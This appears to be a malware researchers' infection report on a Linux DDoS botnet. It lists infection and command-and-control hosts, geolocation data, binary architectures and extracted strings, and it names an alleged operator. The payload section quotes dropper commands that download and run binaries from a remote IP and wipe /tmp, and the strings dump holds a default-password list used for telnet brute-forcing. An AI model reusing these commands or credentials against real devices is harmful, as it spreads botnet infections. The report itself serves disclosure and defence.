Malware ELF DDOS Botnet Torlus/GayFgt Infection Report

MalwareMustDie, Feb 27th, 2016 (edited)
   _____         .__                                  _____                  __ _______  .__        
  /     \ _____  |  |__  _  _______ _______   ____   /     \  __ __  _______/  |\____ \ |__| ____  
 /  \ /  \\__  \ |  |\ \/ \/ /\__  \\_  __ \_/ __ \ /  \ /  \|  |  \/  ___/\   __\  |  \|  |/ __ \
/    Y    \/ __ \|  |_\     /  / __ \|  | \/\  ___//    Y    \  |  /\___ \  |  | |  `   \  \  ___/
\____|__  (____  /____/\/\_/  (____  /__|    \___  >____|__  /____//____  > |__|/__ __  /__|\___  >
        \/     \/                  \/            \/        \/           \/             \/        \/
#MalwareMustDie :: malwaremustdie.org

###############################
# 0x01. Cyber crime Suspect
###############################

  Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
  Verdict: Hacks routers to plant ELF malware backdoors for DDoS attacks & other malicious purposes;
           a Lizard Squad loony and administrator of the Lizard Stresser service.
           PoC: https://pastebin.com/raw/nweQVfN6
  Profile:
  http://malwaremustdie.org/stat/antichrist.html

###############################
# 0x02. Report details
###############################

   New malware infrastructure in Moldova & Lithuania
   Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab, multi-architecture.
   Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
   http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html

#### ELF INFECTION #######

// infection:
http://new.updatebits.su/get.sh (185.130.5.179)
// updates1:
http://new.updatebits.su/cfw.sh (185.130.5.179)
// updates2:
cf.updatebits.su (208.67.1.66)

// CNC:
176.123.7.70:168
hostname: 176-123-7-70.alexhost.md (176.123.7.70)
Connection to 176.123.7.70 168 port [tcp/] succeeded!

// domain:
domain:        UPDATEBITS.SU
nserver:       amy.ns.cloudflare.com.
nserver:       art.ns.cloudflare.com.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        zefknot@gmx.com
registrar:     R01-REG-FID
created:       2015.11.28
paid-till:     2016.11.28
free-date:     2016.12.31
source:        TCI

#### PAYLOAD SERVER #######

HTTP/1.1 200 OK
Date: Sat, 27 Feb 2016 13:28:25 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
ETag: "14202b6-703-52cb39c0a08f2"
200 OK

#### LOCATION ######

{
  "ip": "185.130.5.179",
  "hostname": "new.updatebits.su",
  "city": "",
  "region": "",
  "country": "LT",
  "loc": "56.0000,24.0000",
  "org": "AS60117 Host Sailor Ltd."
}
{
  "ip": "176.123.7.70",
  "hostname": "176-123-7-70.alexhost.md",
  "city": "Chisinau",
  "region": "Municipiul Chisinau",
  "country": "MD",
  "loc": "47.0056,28.8575",
  "org": "AS200019 ALEXHOST SRL"
}
{
  "ip": "208.67.1.66",
  "hostname": "cf.updatebits.su",
  "city": "Kansas City",
  "region": "Missouri",
  "country": "US",
  "loc": "39.1472,-94.5735",
  "org": "AS33387 DataShack, LC",
  "postal": "64116"
}

#### PAYLOADS #######

-------------------
ulimit -n 712
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
rm -rf /tmp/1
rm -rf /var/run/

#### BINS #######

--------------------
d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped

#### HASHES #######

--------------------

#### SNIPS #######

--------------------
.rodata:0x0805CD40  176.123.7.70:168
.rodata:0x0805CD51  root
.rodata:0x0805CD57  admin
.rodata:0x0805CD5E  user
.rodata:0x0805CD64  login
.rodata:0x0805CD6B  guest
.rodata:0x0805CD72  support
.rodata:0x0805CD7B  cisco
.rodata:0x0805CD82  toor
.rodata:0x0805CD88  changeme
.rodata:0x0805CD92  1234
.rodata:0x0805CD98  12345
.rodata:0x0805CD9F  123456
.rodata:0x0805CDA7  default
.rodata:0x0805CDB0  pass
.rodata:0x0805CDB6  password
.rodata:0x0805CDC0  vizxv
.rodata:0x0805CDC7  (null)
.rodata:0x0805CDCE  buf: %s\n
.rodata:0x0805CDD7  -c
.rodata:0x0805CDDA  sh
.rodata:0x0805CDDD  /bin/sh
.rodata:0x0805D200  /proc/cpuinfo
.rodata:0x0805D20E  BOGOMIPS
.rodata:0x0805D217  PING
.rodata:0x0805D21C  :>%$#
.rodata:0x0805D223  %d.%d.%d.%d
.rodata:0x0805D22F  %d.%d.%d.0
.rodata:0x0805D23A  ogin:
.rodata:0x0805D240  \r\n
.rodata:0x0805D243  assword:
.rodata:0x0805D24C  ncorrect
.rodata:0x0805D255  sh\r\n
.rodata:0x0805D25A  shell\r\n
.rodata:0x0805D264  cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
.rodata:0x0805D364  /bin/busybox;echo -e 'gayfgt'\r\n
.rodata:0x0805D384  ulti-call
.rodata:0x0805D38E  REPORT %s:%s:%s
.rodata:0x0805D39E  gayfgt
.rodata:0x0805D3D8  Failed opening raw socket.
.rodata:0x0805D3F4  Failed setting raw headers mode.
.rodata:0x0805D415  all
.rodata:0x0805D41B  syn
.rodata:0x0805D41F  rst
.rodata:0x0805D423  fin
.rodata:0x0805D427  ack
.rodata:0x0805D42B  psh
.rodata:0x0805D42F  Invalid flag \"%s\"
.rodata:0x0805D441  PONG!
.rodata:0x0805D447  GETLOCALIP
.rodata:0x0805D452  My IP: %s
.rodata:0x0805D45C  SCANNER
.rodata:0x0805D464  SCANNER ON | OFF
.rodata:0x0805D475  OFF
.rodata:0x0805D479  ON
.rodata:0x0805D47C  FORK
.rodata:0x0805D481  HOLD
.rodata:0x0805D486  JUNK
.rodata:0x0805D48B  UDP
.rodata:0x0805D48F  TCP
.rodata:0x0805D493  KILLATTK
.rodata:0x0805D49C  Killed %d.
.rodata:0x0805D4A7  None Killed.
.rodata:0x0805D4B4  LOLNOGTFO
.rodata:0x0805D4BE  8.8.8.8
.rodata:0x0805D4C6  /proc/net/route
.rodata:0x0805D4D6  \t00000000\t
.rodata:0x0805D4E1  [cpuset]
.rodata:0x0805D4EA  fork failed\n
.rodata:0x0805D4F9  FAILED TO CONNECT
.rodata:0x0805D50B  PONG
.rodata:0x0805D510  DUP
.rodata:0x0805D514  SH
.rodata:0x0805D517  %s 2>&1
.rodata:0x0805D523  LINK CLOSED
.rodata:0x0805D564  0.9.30
.rodata:0x0805DBC8  -c
.rodata:0x0805DBCB  /bin/sh
.rodata:0x0805DE2C  /dev/null
.rodata:0x0805DE74  clntudp_create: out of memory\n
.rodata:0x0805DEE0  bad auth_len gid %d str %d auth %d\n
.rodata:0x0805DF04  xdr_string: out of memory\n
.rodata:0x0805DF1F  xdr_bytes: out of memory\n
.rodata:0x0805DF68  (nil)
.rodata:0x0805DF6E  (null)
.rodata:0x0805DFC5  npxXoudifFeEgGaACScs
.rodata:0x0805EB90  __get_myaddress: socket
.rodata:0x0805EBA8  __get_myaddress: ioctl (get interface configuration)
.rodata:0x0805EBDD  __get_myaddress: ioctl
.rodata:0x0805EBF4  Cannot register service
.rodata:0x0805EC1C  xdr_array: out of memory\n
.rodata:0x0805EC38  /etc/resolv.conf
.rodata:0x0805EC49  /etc/config/resolv.conf
.rodata:0x0805EC61  nameserver
.rodata:0x0805EC6C  domain
.rodata:0x0805EC73  search
.rodata:0x0805EC7A  %s%s%m\n
.rodata:0x0805ED5C  RPC: (unknown error code)
.rodata:0x0805ED76  %s:
.rodata:0x0805ED7F  ; errno = %s
.rodata:0x0805ED8C  ; low version = %lu, high version = %lu
.rodata:0x0805EDB4  ; why =
.rodata:0x0805EDBD  (unknown authentication error - %d)
.rodata:0x0805EDE1  ; s1 = %lu, s2 = %lu
.rodata:0x0805F1D4  %x
.rodata:0x0805F1D7  0123456789abcdef
.rodata:0x0805F1E8  /etc/hosts
.rodata:0x0805F1F3  /etc/config/hosts

###############################
# 0x03. Contact us for more information
###############################

Twitter: @malwaremustdie (Direct Message)
         warning: your IP/location will be scanned & conversation is recorded
         Come clean & stay safe!

#MalwareMustDie!
[EOF]